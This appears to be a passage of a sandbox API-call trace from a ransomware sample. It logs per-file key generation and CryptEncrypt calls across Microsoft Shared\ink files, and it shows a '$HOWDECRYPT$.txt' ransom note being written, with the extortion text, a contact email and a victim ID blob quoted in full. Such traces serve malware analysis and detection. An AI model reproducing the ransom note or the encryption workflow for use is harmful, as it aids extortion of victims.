(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0086.942] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fef8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fef8*=0x2ac, lpOverlapped=0x0) returned 1 [0086.942] CloseHandle (hObject=0x15c) returned 1 [0086.942] GetProcessHeap () returned 0x2c0000 [0086.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373098 | out: hHeap=0x2c0000) returned 1 [0086.942] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe98 | out: pbBuffer=0x270fe98) returned 1 [0086.942] GetProcessHeap () returned 0x2c0000 [0086.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0086.942] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe90*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe90*=0x30) returned 1 [0086.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.943] GetProcessHeap () returned 0x2c0000 [0086.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0086.943] GetProcessHeap () returned 0x2c0000 [0086.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372fb0 | out: hHeap=0x2c0000) returned 1 [0086.943] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe90 | out: pbBuffer=0x270fe90) returned 1 [0086.943] GetProcessHeap () returned 0x2c0000 [0086.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0086.943] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe88*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe88*=0x30) returned 1 [0086.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.971] GetProcessHeap () returned 0x2c0000 [0086.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0086.971] GetProcessHeap () returned 0x2c0000 [0086.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3594b0 | out: hHeap=0x2c0000) returned 1 [0086.971] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe90 | out: pbBuffer=0x270fe90) returned 1 [0086.972] GetProcessHeap () returned 0x2c0000 [0086.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0086.972] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe88*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe88*=0x30) returned 1 [0086.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.043] GetProcessHeap () returned 0x2c0000 [0087.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.043] GetProcessHeap () returned 0x2c0000 [0087.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x359170 | out: hHeap=0x2c0000) returned 1 [0087.044] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe88 | out: pbBuffer=0x270fe88) returned 1 [0087.044] GetProcessHeap () returned 0x2c0000 [0087.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.044] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe80*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe80*=0x30) returned 1 [0087.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.089] GetProcessHeap () returned 0x2c0000 [0087.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.089] GetProcessHeap () returned 0x2c0000 [0087.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358e30 | out: hHeap=0x2c0000) returned 1 [0087.089] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe88 | out: pbBuffer=0x270fe88) returned 1 [0087.089] GetProcessHeap () returned 0x2c0000 [0087.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.089] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe80*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe80*=0x30) returned 1 [0087.089] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.090] GetProcessHeap () returned 0x2c0000 [0087.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.090] GetProcessHeap () returned 0x2c0000 [0087.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358bc0 | out: hHeap=0x2c0000) returned 1 [0087.090] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe80 | out: pbBuffer=0x270fe80) returned 1 [0087.090] GetProcessHeap () returned 0x2c0000 [0087.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.090] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe78*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe78*=0x30) returned 1 [0087.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.091] GetProcessHeap () returned 0x2c0000 [0087.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.091] GetProcessHeap () returned 0x2c0000 [0087.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358af0 | out: hHeap=0x2c0000) returned 1 [0087.091] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe80 | out: pbBuffer=0x270fe80) returned 1 [0087.091] GetProcessHeap () returned 0x2c0000 [0087.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.091] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe78*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe78*=0x30) returned 1 [0087.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.091] GetProcessHeap () returned 0x2c0000 [0087.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.091] GetProcessHeap () returned 0x2c0000 [0087.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358a20 | out: hHeap=0x2c0000) returned 1 [0087.091] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe78 | out: pbBuffer=0x270fe78) returned 1 [0087.091] GetProcessHeap () returned 0x2c0000 [0087.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.091] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe70*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe70*=0x30) returned 1 [0087.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.092] GetProcessHeap () returned 0x2c0000 [0087.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.092] GetProcessHeap () returned 0x2c0000 [0087.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358950 | out: hHeap=0x2c0000) returned 1 [0087.092] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe78 | out: pbBuffer=0x270fe78) returned 1 [0087.092] GetProcessHeap () returned 0x2c0000 [0087.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.092] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe70*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe70*=0x30) returned 1 [0087.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.093] GetProcessHeap () returned 0x2c0000 [0087.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.093] GetProcessHeap () returned 0x2c0000 [0087.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358880 | out: hHeap=0x2c0000) returned 1 [0087.093] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe70 | out: pbBuffer=0x270fe70) returned 1 [0087.093] GetProcessHeap () returned 0x2c0000 [0087.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.093] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe68*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe68*=0x30) returned 1 [0087.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.094] GetProcessHeap () returned 0x2c0000 [0087.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.094] GetProcessHeap () returned 0x2c0000 [0087.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384aa0 | out: hHeap=0x2c0000) returned 1 [0087.094] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe70 | out: pbBuffer=0x270fe70) returned 1 [0087.094] GetProcessHeap () returned 0x2c0000 [0087.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.094] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe68*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe68*=0x30) returned 1 [0087.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.094] GetProcessHeap () returned 0x2c0000 [0087.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.094] GetProcessHeap () returned 0x2c0000 [0087.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3587b0 | out: hHeap=0x2c0000) returned 1 [0087.094] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe68 | out: pbBuffer=0x270fe68) returned 1 [0087.094] GetProcessHeap () returned 0x2c0000 [0087.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.094] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe60*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe60*=0x30) returned 1 [0087.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.095] GetProcessHeap () returned 0x2c0000 [0087.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.095] GetProcessHeap () returned 0x2c0000 [0087.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3586e0 | out: hHeap=0x2c0000) returned 1 [0087.095] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe68 | out: pbBuffer=0x270fe68) returned 1 [0087.095] GetProcessHeap () returned 0x2c0000 [0087.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.095] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe60*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe60*=0x30) returned 1 [0087.095] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.184] GetProcessHeap () returned 0x2c0000 [0087.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.184] GetProcessHeap () returned 0x2c0000 [0087.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358610 | out: hHeap=0x2c0000) returned 1 [0087.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.184] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.185] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd97*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fec0, lpOverlapped=0x0 | out: lpBuffer=0x270fd97*, lpNumberOfBytesWritten=0x270fec0*=0x127, lpOverlapped=0x0) returned 1 [0087.186] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.186] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fec0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fec0*=0x2ac, lpOverlapped=0x0) returned 1 [0087.186] CloseHandle (hObject=0x15c) returned 1 [0087.186] GetProcessHeap () returned 0x2c0000 [0087.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373180 | out: hHeap=0x2c0000) returned 1 [0087.186] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe60 | out: pbBuffer=0x270fe60) returned 1 [0087.186] GetProcessHeap () returned 0x2c0000 [0087.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.186] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe58*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe58*=0x30) returned 1 [0087.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.187] GetProcessHeap () returned 0x2c0000 [0087.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.187] GetProcessHeap () returned 0x2c0000 [0087.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372ec8 | out: hHeap=0x2c0000) returned 1 [0087.188] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe58 | out: pbBuffer=0x270fe58) returned 1 [0087.188] GetProcessHeap () returned 0x2c0000 [0087.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.188] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe50*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe50*=0x30) returned 1 [0087.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.188] GetProcessHeap () returned 0x2c0000 [0087.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.188] GetProcessHeap () returned 0x2c0000 [0087.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3582d0 | out: hHeap=0x2c0000) returned 1 [0087.188] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe58 | out: pbBuffer=0x270fe58) returned 1 [0087.188] GetProcessHeap () returned 0x2c0000 [0087.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.188] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe50*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe50*=0x30) returned 1 [0087.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.189] GetProcessHeap () returned 0x2c0000 [0087.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.189] GetProcessHeap () returned 0x2c0000 [0087.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358200 | out: hHeap=0x2c0000) returned 1 [0087.189] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe50 | out: pbBuffer=0x270fe50) returned 1 [0087.189] GetProcessHeap () returned 0x2c0000 [0087.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.189] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe48*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe48*=0x30) returned 1 [0087.189] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.189] GetProcessHeap () returned 0x2c0000 [0087.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.189] GetProcessHeap () returned 0x2c0000 [0087.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372de0 | out: hHeap=0x2c0000) returned 1 [0087.189] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe50 | out: pbBuffer=0x270fe50) returned 1 [0087.189] GetProcessHeap () returned 0x2c0000 [0087.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.189] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe48*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe48*=0x30) returned 1 [0087.189] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkwatson.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.190] GetProcessHeap () returned 0x2c0000 [0087.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.190] GetProcessHeap () returned 0x2c0000 [0087.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3243b0 | out: hHeap=0x2c0000) returned 1 [0087.190] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe48 | out: pbBuffer=0x270fe48) returned 1 [0087.190] GetProcessHeap () returned 0x2c0000 [0087.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.191] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe40*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe40*=0x30) returned 1 [0087.191] CreateFileW 